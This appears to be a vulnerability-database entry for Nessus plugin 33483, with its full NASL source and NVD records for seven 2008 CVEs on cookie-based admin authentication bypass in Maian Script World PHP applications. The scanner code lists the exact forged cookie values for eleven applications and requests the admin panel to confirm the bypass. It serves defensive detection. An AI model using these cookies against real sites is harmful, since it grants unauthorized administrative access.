Description
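The remote host is running at least one PHP application from Maian Script World whose admin control panel accepts a client-supplied cookie as proof of login. A remote, unauthenticated attacker can therefore bypass authentication and access the admin control panel by simply setting that cookie; no valid credentials are needed. The plugin reports a finding only after it has set the cookie itself and received the administration page, so a result indicates a confirmed bypass rather than a version match.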
Related
{"id": "MAIAN_COOKIE_AUTH_BYPASS.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Maian Scripts Cookie Manipulation Authentication Bypass", "description": "The remote host is running at least one PHP application from Maian Script World that allows a remote attacker to bypass authentication and access the admin control panel by simply setting a special cookie.", "published": "2008-07-15T00:00:00", "modified": "2022-04-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/33483", "reporter": "This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3319", "http://www.nessus.org/u?8d1af886", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3321"], "cvelist": ["CVE-2008-3317", "CVE-2008-3318", "CVE-2008-3319", "CVE-2008-3320", "CVE-2008-3321", "CVE-2008-3322", "CVE-2008-7086"], "immutableFields": [], "lastseen": "2022-04-12T15:36:37", "viewCount": 2023, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3317", "CVE-2008-3318", "CVE-2008-3319", "CVE-2008-3320", "CVE-2008-3321", "CVE-2008-3322", "CVE-2008-7086"]}], "rev": 4}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2008-3317", "CVE-2008-3318", "CVE-2008-3319", "CVE-2008-3320", "CVE-2008-3321", "CVE-2008-3322"]}, {"type": "nessus", "idList": ["HTTP_VERSION.NASL"]}]}, "exploitation": null, "vulnersScore": 5.9}, "_state": {"dependencies": 0, "score": 0}, 
"_internal": {}, "pluginID": "33483", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33483);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2008-3317\",\n \"CVE-2008-3318\",\n \"CVE-2008-3319\",\n \"CVE-2008-3320\",\n \"CVE-2008-3321\",\n \"CVE-2008-3322\",\n \"CVE-2008-7086\"\n );\n script_bugtraq_id(\n 30195,\n 30196,\n 30197,\n 30198,\n 30199,\n 30203,\n 30205,\n 30208,\n 30209,\n 30210,\n 30211\n );\n script_xref(name:\"EDB-ID\", value:\"6047\");\n script_xref(name:\"EDB-ID\", value:\"6048\");\n script_xref(name:\"EDB-ID\", value:\"6049\");\n script_xref(name:\"EDB-ID\", value:\"6050\");\n script_xref(name:\"EDB-ID\", value:\"6051\");\n script_xref(name:\"EDB-ID\", value:\"6061\");\n script_xref(name:\"EDB-ID\", value:\"6062\");\n script_xref(name:\"EDB-ID\", value:\"6063\");\n script_xref(name:\"EDB-ID\", value:\"6064\");\n script_xref(name:\"EDB-ID\", value:\"6065\");\n script_xref(name:\"EDB-ID\", value:\"6066\");\n script_xref(name:\"SECUNIA\", value:\"31038\");\n script_xref(name:\"SECUNIA\", value:\"31056\");\n\n script_name(english:\"Maian Scripts Cookie Manipulation Authentication Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains at least one PHP application that\nallows a remote attacker to bypass authentication.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running at least one PHP application from Maian\nScript World that allows a remote attacker to bypass authentication\nand access the admin control panel by simply setting a special cookie.\");\n # http://web.archive.org/web/20120226153853/http://www.maianscriptworld.co.uk/free-php-scripts/maian-weblog/development/index.html\n script_set_attribute(attribute:\"see_also\", 
value:\"http://www.nessus.org/u?8d1af886\");\n script_set_attribute(attribute:\"solution\", value:\n\"Download the update-14-7-08 security patch and follow the instructions\nin the readme to update the vulnerable application(s).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_cwe_id(287);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Map apps to cookies.\nadmin_md5 = hexstr(MD5(\"admin\"));\ncookie[\"Maian Cart\"] = string(\"mccart_cookie=\", admin_md5);\ncookie[\"Maian Events\"] = string(\"mevents_admin_cookie=\", admin_md5);\ncookie[\"Maian Gallery\"] = string(\"mgallery_admin_cookie=\", admin_md5);\ncookie[\"Maian Greetings\"] = string(\"mecard_admin_cookie=1\");\ncookie[\"Maian Guestbook\"] = string(\"gbook_cookie=1\");\ncookie[\"Maian Links\"] = string(\"links_cookie=1\");\ncookie[\"Maian Music\"] = string(\"mmusic_cookie=\", admin_md5);\ncookie[\"Maian Recipe\"] = 
string(\"recipe_cookie=1\");\ncookie[\"Maian Search\"] = string(\"search_cookie=1\");\ncookie[\"Maian Uploader\"] = string(\"uploader_cookie=1\");\ncookie[\"Maian Weblog\"] = string(\"weblog_cookie=1\");\n\n\n# Loop through various directories.\nif (thorough_tests) dirs = make_list(\n \"/cart\",\n \"/events\",\n \"/gallery\",\n \"/greetings\",\n \"/guestbook\",\n \"/links\",\n \"/music\",\n \"/recipe\",\n \"/search\",\n \"/uploader\",\n \"/weblog\",\n cgi_dirs()\n);\nelse dirs = make_list(cgi_dirs());\n\nforeach dir (dirs)\n{\n # Try to pull up the login page for the administration control panel.\n url = string(dir, \"/admin/index.php\");\n\n clear_cookiejar();\n r = http_send_recv3(method: \"GET\", item:string(url, \"?cmd=login\"), port:port);\n if (isnull(r)) exit(0);\n\n # If it's one of the Maian scripts...\n pat = \"<title>(Maian [^ ]+) v[0-9]+\\.\";\n matches = egrep(pattern:pat, string:r[2]);\n if (matches)\n {\n # Identify the application.\n app = NULL;\n\n foreach match (split(matches))\n {\n match = chomp(match);\n item = eregmatch(pattern:pat, string:match);\n if (!isnull(item))\n {\n app = item[1];\n break;\n }\n }\n\n # Determine which cookie to use.\n if (cookie[app])\n {\n v = split(cookie[app], sep: '=', keep: 0);\n set_http_cookie(name: v[0], value: v[1]);\n # Try to exploit the issue to gain access to the admin control panel.\n url = string(url, \"?cmd=home\");\n r = http_send_recv3(method: \"GET\", item:url, port:port);\n if (isnull(r)) exit(0);\n\n # There's a problem if we now have access to the admin control panel.\n if (\n (\n # nb: this actually appears in Maian Greetings!\n \" - Adminstration</title>\" >< r[2] ||\n \" - Administration</title>\" >< r[2]\n ) &&\n '=\"index.php?cmd=logout\"' >< r[2]\n )\n {\n if (report_verbosity)\n {\n report = string(\n \"Nessus was able to gain access to the administration control panel\\n\",\n \"for \", app, \" on the remote host using the following URL :\\n\",\n \"\\n\",\n \" \", build_url(port:port, 
qs:url), \"\\n\",\n \"\\n\",\n \"and setting the following cookie :\\n\",\n \"\\n\",\n \" Cookie: \", cookie[app], \"\\n\"\n );\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n # nb: don't break - there still may be other vulnerable apps installed.\n }\n }\n }\n}\n", "naslFamily": "CGI abuses", "cpe": [], "solution": "Download the update-14-7-08 security patch and follow the instructions in the readme to update the vulnerable application(s).", "nessusSeverity": "High", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}
{"cve": [{"lastseen": "2022-03-23T12:31:29", "description": "admin/index.php in Maian Uploader 4.0 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary uploader_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3321", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3321"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:maian_script_world:maian_uploader:4.0"], "id": "CVE-2008-3321", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3321", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian_script_world:maian_uploader:4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:31:31", "description": "admin/index.php in Maian Recipe 1.2 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary recipe_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3322", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3322"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:maian:recipe:1.2"], "id": "CVE-2008-3322", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3322", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian:recipe:1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:31:28", "description": "admin/index.php in Maian Guestbook 3.2 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary gbook_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3320", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3320"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:maian:guestbook:3.2"], "id": "CVE-2008-3320", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3320", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian:guestbook:3.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:19:01", "description": "Maian Greetings 2.1 allows remote attackers to bypass authentication and gain administrative privileges by setting the mecard_admin_cookie cookie to admin.", "cvss3": {}, "published": "2009-08-26T14:24:00", "type": "cve", "title": "CVE-2008-7086", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7086"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:maianscriptworld:maian_greetings:2.1"], "id": "CVE-2008-7086", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7086", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maianscriptworld:maian_greetings:2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:31:26", "description": "admin/index.php in Maian Links 3.1 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary links_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3319", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3319"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:maian:links:3.1"], "id": "CVE-2008-3319", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3319", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian:links:3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:31:22", "description": "admin/index.php in Maian Search 1.1 and earlier 
allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary search_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3317", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3317"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:maian_script_world:maian_search:1.0", "cpe:/a:maian_script_world:maian_search:1.1"], "id": "CVE-2008-3317", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3317", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian_script_world:maian_search:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:maian_script_world:maian_search:1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:31:24", "description": "admin/index.php in Maian Weblog 4.0 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary weblog_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3318", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3318"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:maian:weblog:3.1", "cpe:/a:maian:weblog:4.0"], "id": "CVE-2008-3318", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3318", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian:weblog:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:maian:weblog:4.0:*:*:*:*:*:*:*"]}]}